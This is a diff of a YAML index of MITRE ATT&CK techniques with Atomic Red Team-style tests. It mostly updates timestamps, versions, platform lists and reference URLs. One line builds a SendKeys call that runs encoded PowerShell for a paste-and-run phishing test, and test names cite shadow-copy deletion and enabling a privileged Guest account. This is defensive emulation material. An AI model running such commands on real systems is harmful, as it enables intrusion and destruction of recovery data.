+      id: attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab
+      created: '2019-04-17T20:23:15.105Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1498
+        external_id: T1498
+      - source_name: Cisco DoSdetectNetflow
+        description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+          Retrieved April 25, 2019.
+        url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+      - source_name: FSISAC FraudNetDoS September 2012
+        description: FS-ISAC. (2012, September 17). Fraud Alert – Cyber Criminals
+          Targeting Financial Institution Employee Credentials to Conduct Wire Transfer
+          Fraud. Retrieved September 23, 2024.
+        url: https://www.ic3.gov/Media/PDF/Y2012/FraudAlertFinancialInstitutionEmployeeCredentialsTargeted.pdf
+      - source_name: FireEye OpPoisonedHandover February 2016
+        description: 'Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November
+          3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in
+          Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.'
+        url: https://www.fireeye.com/blog/threat-research/2014/11/operation-poisoned-handover-unveiling-ties-between-apt-activity-in-hong-kongs-pro-democracy-movement.html
+      - source_name: Symantec DDoS October 2014
+        description: Wueest, C.. (2014, October 21). The continued rise of DDoS attacks.
+          Retrieved April 24, 2019.
+        url: https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1495:
     technique:
@@ -116096,11 +117031,10 @@ impact:
       - Availability
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1490:
     technique:
-      modified: '2024-04-12T02:30:08.379Z'
+      modified: '2024-09-24T13:27:31.881Z'
       name: Inhibit System Recovery
       description: |-
         Adversaries may delete or remove built-in data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) This may deny access to available backups and recovery options.
@@ -116118,7 +117052,7 @@ impact:
 
         On network devices, adversaries may leverage [Disk Wipe](https://attack.mitre.org/techniques/T1561) to delete backup firmware images and reformat the file system, then [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to reload the device. Together this activity may leave network devices completely inoperable and inhibit recovery operations.
 
-        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
+        Adversaries may also delete “online” backups that are connected to their network – whether via network storage media or through folders that sync to cloud services.(Citation: ZDNet Ransomware Backups 2020) In cloud environments, adversaries may disable versioning and backup policies and delete snapshots, database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: impact
@@ -116145,7 +117079,7 @@ impact:
       - Network
       - IaaS
       - Containers
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -116195,13 +117129,12 @@ impact:
         url: https://www.zdnet.com/article/ransomware-victims-thought-their-backups-were-safe-they-were-wrong/
       - source_name: disable_notif_synology_ransom
         description: TheDFIRReport. (2022, March 1). Disabling notifications on Synology
-          servers before ransom. Retrieved October 19, 2022.
-        url: https://twitter.com/TheDFIRReport/status/1498657590259109894
+          servers before ransom. Retrieved September 12, 2024.
+        url: https://x.com/TheDFIRReport/status/1498657590259109894
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1490
     atomic_tests:
     - name: Windows - Delete Volume Shadow Copies
@@ -116484,11 +117417,10 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1529:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-22T20:45:22.531Z'
       name: System Shutdown/Reboot
       description: |-
         Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. <code>reload</code>).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)
@@ -116553,7 +117485,6 @@ impact:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1529
     atomic_tests:
     - name: Shutdown System - Windows
@@ -116829,7 +117760,7 @@ impact:
 initial-access:
   T1133:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:36.318Z'
       name: External Remote Services
       description: |-
         Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) and [VNC](https://attack.mitre.org/techniques/T1021/005) can also be used externally.(Citation: MacOS VNC software for Remote Desktop)
@@ -116907,7 +117838,6 @@ initial-access:
         url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1133
     atomic_tests:
     - name: Running Chrome VPN Extensions via the Registry 2 vpn extension
@@ -117003,11 +117933,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566.002:
     technique:
-      modified: '2024-04-15T23:51:25.037Z'
+      modified: '2024-10-15T16:06:32.591Z'
       name: 'Phishing: Spearphishing Link'
       description: |-
         Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
@@ -117046,10 +117975,10 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '2.6'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Application Log: Application Log Content'
@@ -117066,7 +117995,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: CISA IDN ST05-016
         description: 'CISA. (2019, September 27). Security Tip (ST05-016): Understanding
           Internationalized Domain Names. Retrieved October 20, 2020.'
@@ -117105,7 +118034,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.002
     atomic_tests:
     - name: Paste and run technique
@@ -117152,7 +118080,7 @@ initial-access:
           [System.Windows.Forms.SendKeys]::SendWait("cmd /c powershell -ec " + [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('#{execution_command}')) + "{ENTER}")
   T1566.001:
     technique:
-      modified: '2024-01-31T14:09:27.066Z'
+      modified: '2024-10-15T16:42:01.552Z'
       name: 'Phishing: Spearphishing Attachment'
       description: "Adversaries may send spearphishing emails with a malicious attachment
         in an attempt to gain access to victim systems. Spearphishing attachment is
@@ -117214,7 +118142,7 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
       - source_name: Unit 42 DarkHydrus July 2018
         description: Falcone, R., et al. (2018, July 27). New Threat Actor Group DarkHydrus
           Targets Middle East Government. Retrieved August 2, 2018.
@@ -117231,7 +118159,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1566.001
     atomic_tests:
     - name: Download Macro-Enabled Phishing Attachment
@@ -117322,7 +118249,7 @@ initial-access:
         the adversary a high degree of control over the system. Hardware backdoors
         may be inserted into various devices, such as servers, workstations, network
         infrastructure, or peripherals.
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:05:10.755Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Hardware Supply Chain
       x_mitre_detection: Perform physical inspection of hardware to look for potential
@@ -117336,7 +118263,6 @@ initial-access:
       - 'Sensor Health: Host Status'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1091:
     technique:
@@ -117399,7 +118325,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests:
     - name: USB Malware Spread Simulation
@@ -117426,7 +118351,7 @@ initial-access:
           }
   T1195:
     technique:
-      modified: '2024-02-26T14:23:37.009Z'
+      modified: '2024-10-04T11:17:00.778Z'
       name: Supply Chain Compromise
       description: "Adversaries may manipulate products or product delivery mechanisms
         prior to receipt by a final consumer for the purpose of data or system compromise.\n\nSupply
@@ -117501,7 +118426,7 @@ initial-access:
         description: Schneider Electric. (2018, August 24). Security Notification
           – USB Removable Media Provided With Conext Combox and Conext Battery Monitor.
           Retrieved May 28, 2019.
-        url: https://www.se.com/ww/en/download/document/SESN-2018-236-01/
+        url: https://www.se.com/us/en/download/document/SESN-2018-236-01/
       - source_name: Trendmicro NPM Compromise
         description: Trendmicro. (2018, November 29). Hacker Infects Node.js Package
           to Steal from Bitcoin Wallets. Retrieved April 10, 2019.
@@ -117515,7 +118440,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1195
     atomic_tests:
     - name: Octopus Scanner Malware Open Source Supply Chain
@@ -117553,14 +118477,14 @@ initial-access:
         name: command_prompt
   T1190:
     technique:
-      modified: '2023-11-28T21:27:35.373Z'
+      modified: '2024-09-24T14:33:53.433Z'
       name: Exploit Public-Facing Application
       description: |-
         Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.
 
-        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
+        Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet-accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211) or [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203).
 
-        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
+        If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs (e.g., via the [Cloud Instance Metadata API](https://attack.mitre.org/techniques/T1552/005)), exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.
 
         Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)
 
@@ -117586,7 +118510,7 @@ initial-access:
       - Linux
       - macOS
       - Containers
-      x_mitre_version: '2.5'
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -117641,7 +118565,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1659:
     technique:
@@ -117704,11 +118627,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -117723,6 +118645,7 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -117731,18 +118654,18 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -117774,9 +118697,6 @@ initial-access:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests:
     - name: Enable Guest account with RDP capability and admin privileges
@@ -117859,7 +118779,7 @@ initial-access:
         elevation_required: true
   T1199:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-15T16:08:39.968Z'
       name: Trusted Relationship
       description: |-
         Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.
@@ -117870,6 +118790,11 @@ initial-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_contributors:
+      - Praetorian
+      - ExtraHop
+      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      x_mitre_deprecated: false
       x_mitre_detection: Establish monitoring for activity conducted by second and
         third party providers and other trusted entities that may be leveraged as
         a means to gain access to the network. Depending on the type of relationship,
@@ -117878,22 +118803,18 @@ initial-access:
         is based on IT services. Adversaries may be able to act quickly towards an
         objective, so proper monitoring for behavior related to Credential Access,
         Lateral Movement, and Collection will be important to detect the intrusion.
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Office 365
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '2.3'
-      x_mitre_contributors:
-      - Praetorian
-      - ExtraHop
-      - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Logon Session: Logon Session Metadata'
@@ -117918,36 +118839,19 @@ initial-access:
         url: https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1566:
     technique:
-      modified: '2024-03-01T16:56:32.245Z'
+      modified: '2024-10-07T15:00:19.668Z'
       name: Phishing
-      description: "Adversaries may send phishing messages to gain access to victim
-        systems. All forms of phishing are electronically delivered social engineering.
-        Phishing can be targeted, known as spearphishing. In spearphishing, a specific
-        individual, company, or industry will be targeted by the adversary. More generally,
-        adversaries can conduct non-targeted phishing, such as in mass malware spam
-        campaigns.\n\nAdversaries may send victims emails containing malicious attachments
-        or links, typically to execute malicious code on victim systems. Phishing
-        may also be conducted via third-party services, like social media platforms.
-        Phishing may also involve social engineering techniques, such as posing as
-        a trusted source, as well as evasive techniques such as removing or manipulating
-        emails or metadata/headers from compromised accounts being abused to send
-        messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation:
-        Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)
-        Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof)
-        the identity of the sender which can be used to fool both the human recipient
-        as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nVictims
-        may also receive phishing messages that instruct them to call a phone number
-        where they are directed to visit a malicious URL, download malware,(Citation:
-        sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software)
-        or install adversary-accessible remote management tools onto their computer
-        (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation:
-        Unit42 Luna Moth)"
+      description: |-
+        Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
+
+        Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
+
+        Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: initial-access
@@ -117976,9 +118880,9 @@ initial-access:
       - macOS
       - Windows
       - SaaS
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Network Traffic: Network Traffic Flow'
@@ -117996,7 +118900,11 @@ initial-access:
       - source_name: ACSC Email Spoofing
         description: Australian Cyber Security Centre. (2012, December). Mitigating
           Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
-        url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+        url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+      - source_name: phishing-krebs
+        description: 'Brian Krebs. (2024, March 28). Thread Hijacking: Phishes That
+          Prey on Your Curiosity. Retrieved September 27, 2024.'
+        url: https://krebsonsecurity.com/2024/03/thread-hijacking-phishes-that-prey-on-your-curiosity/
       - source_name: CISA Remote Monitoring and Management Software
         description: CISA. (n.d.). Protecting Against Malicious Use of Remote Monitoring
           and Management Software. Retrieved February 2, 2023.
@@ -118034,11 +118942,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -118055,7 +118962,6 @@ initial-access:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -118065,7 +118971,7 @@ initial-access:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -118074,19 +118980,17 @@ initial-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -118134,11 +119038,12 @@ initial-access:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1566.004:
     technique:
-      modified: '2023-10-15T11:49:40.990Z'
+      modified: '2024-10-15T16:06:47.134Z'
       name: Spearphishing Voice
       description: |-
         Adversaries may use voice communications to ultimately gain access to victim systems. Spearphishing voice is a specific variant of spearphishing. It is different from other forms of spearphishing in that is employs the use of manipulating a user into providing access to systems through a phone call or other forms of voice communications. Spearphishing frequently involves social engineering techniques, such as posing as a trusted source (ex: [Impersonation](https://attack.mitre.org/techniques/T1656)) and/or creating a sense of urgency or alarm for the recipient.
@@ -118158,10 +119063,8 @@ initial-access:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -118194,7 +119097,6 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1195.002:
     technique:
@@ -118233,7 +119135,7 @@ initial-access:
         may be specific to a desired victim set or may be distributed to a broad set
         of consumers but only move on to additional tactics on specific victims.(Citation:
         Avast CCleaner3 2018)(Citation: Command Five SK 2011)  "
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-04-28T16:04:36.636Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Compromise Software Supply Chain
       x_mitre_detection: 'Use verification of distributed binaries through hash checking
@@ -118248,7 +119150,6 @@ initial-access:
       - 'File: File Metadata'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078.002:
     technique:
@@ -118328,11 +119229,10 @@ initial-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1200:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.332Z'
       name: Hardware Additions
       description: |-
         Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
@@ -118388,11 +119288,10 @@ initial-access:
         url: https://www.youtube.com/watch?v=fXthwl6ShOg
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1189:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:55:47.494Z'
       name: Drive-by Compromise
       description: "Adversaries may gain access to a system through a user visiting
         a website over the normal course of browsing. With this technique, the user's
@@ -118453,8 +119352,8 @@ initial-access:
       - Windows
       - Linux
       - macOS
-      - SaaS
-      x_mitre_version: '1.5'
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
